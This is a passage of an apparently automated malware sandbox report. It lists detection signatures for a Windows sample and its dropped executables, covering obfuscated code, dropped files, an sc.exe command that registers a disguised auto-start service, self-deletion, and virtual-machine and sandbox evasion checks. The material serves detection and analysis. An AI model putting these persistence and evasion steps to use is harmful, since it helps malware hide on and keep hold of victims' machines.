Source: sqlite3[1].dll.19.dr Static PE information: section name: /51
Source: sqlite3[1].dll.19.dr Static PE information: section name: /63
Source: sqlite3[1].dll.19.dr Static PE information: section name: /77
Source: sqlite3[1].dll.19.dr Static PE information: section name: /89
Source: sqlite3[1].dll.19.dr Static PE information: section name: /102
Source: sqlite3[1].dll.19.dr Static PE information: section name: /113
Source: sqlite3[1].dll.19.dr Static PE information: section name: /124
Source: dkbkykdu.exe.21.dr Static PE information: section name: .vupa
Source: initial sample Static PE information: section name: .text entropy: 6.86151494823
Source: initial sample Static PE information: section name: .text entropy: 7.79683538387
Source: initial sample Static PE information: section name: .text entropy: 6.85931692177
Source: initial sample Static PE information: section name: .text entropy: 7.99705057771
Source: initial sample Static PE information: section name: .text entropy: 6.87994948789
Source: initial sample Static PE information: section name: .text entropy: 6.86634281185
Source: initial sample Static PE information: section name: .text entropy: 6.86151494823
Source: initial sample Static PE information: section name: .text entropy: 6.86634281185
Source: 3161.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 3161.exe.11.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 22.0.3161.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.3161.exe.610000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 22.0.3161.exe.610000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.3161.exe.610000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 22.2.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.2.3161.exe.610000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 22.0.3161.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.3161.exe.610000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 22.0.3161.exe.610000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 22.0.3161.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 36.0.3161.exe.350000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 36.0.3161.exe.350000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 36.2.3161.exe.350000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 36.2.3161.exe.350000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 36.0.3161.exe.350000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'
Source: 36.0.3161.exe.350000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 36.0.3161.exe.350000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 't6U6ZLMlVB', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 36.0.3161.exe.350000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'FSlJjr8gAn', '.cctor', 'BCXhs6e4TGHxhHf7QP', 'DMnoGZkYMSIWa74LH9', 'EcY1f3GG62nQEnwoZB', 'BosSuXqdHAVvfvCF1s'

Persistence and Installation Behavior:

barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File created: C:\ProgramData\sqlite3.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ewswwsi Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A7CD.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D845.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\1E73.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\SysWOW64\vlrzpavj\dkbkykdu.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File created: C:\ProgramData\sqlite3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8DDA.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9667.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2961.exe File created: C:\Users\user\AppData\Local\Temp\dkbkykdu.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D19D.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3161.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2961.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ewswwsi Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\SysWOW64\vlrzpavj\dkbkykdu.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create vlrzpavj binPath= "C:\Windows\SysWOW64\vlrzpavj\dkbkykdu.exe /d\"C:\Users\user\AppData\Local\Temp\2961.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep, 21_2_00409A6B

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\4f4dercud7.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\ewswwsi:Zone.Identifier read attributes | delete Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress, 19_2_0040C2E0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2961.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 4f4deRCUD7.exe, 00000003.00000002.329548452.0000000001F90000.00000004.00000001.sdmp Binary or memory string: ASWHOOKRF{<S
Source: ewswwsi, 00000010.00000002.380492910.00000000004FB000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewswwsi Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00406AA0 19_2_00406AA0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00866CF0 19_2_00866CF0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6820 Thread sleep time: -33100s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6816 Thread sleep time: -31500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe TID: 3380 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4940 Thread sleep count: 33 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\3161.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 569 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 399 Jump to behavior
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00866CF0 19_2_00866CF0
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D845.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A7CD.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Windows\SysWOW64\vlrzpavj\dkbkykdu.exe (copy) Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9667.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8DDA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2961.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dkbkykdu.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D19D.exe Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\3161.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: explorer.exe, 0000000B.00000000.296114624.000000000EEB9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.D_k
Source: explorer.exe, 0000000B.00000000.324053209.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.316544988.0000000000B7D000.00000004.00000020.sdmp Binary or memory string: War&Prod_VMware_SATA
Source: 1E73.exe, 00000013.00000002.412076476.0000000000B42000.00000004.00000001.sdmp Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.296114624.000000000EEB9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 0000000B.00000000.296114624.000000000EEB9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}soft.wi)_
Source: explorer.exe, 0000000B.00000000.324261845.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000B.00000000.324053209.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000B.00000000.304627503.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.304627503.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: 1E73.exe, 00000013.00000002.411920357.0000000000ADC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: 3161.exe Binary or memory string: d0mVS9XkRiWyXacaxyBS6zJoYofT5ykryAVrO24oEgDz8KzYGifrrLKgvEP1q2peVRljBPpkqpVMci3wmCKIDINhwJhWPxDkU1VzXfycTZzx/319ADPJfxW5cjPRZAgtAA
Source: 1E73.exe, 00000013.00000002.411920357.0000000000ADC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn
Source: 1E73.exe, 00000013.00000002.412076476.0000000000B42000.00000004.00000001.sdmp Binary or memory string: r&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000B.00000000.324053209.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: svchost.exe, 00000005.00000002.540229534.0000014E0BA3E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.540077291.000002EAB622A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Process information queried: ProcessInformation Jump to behavior
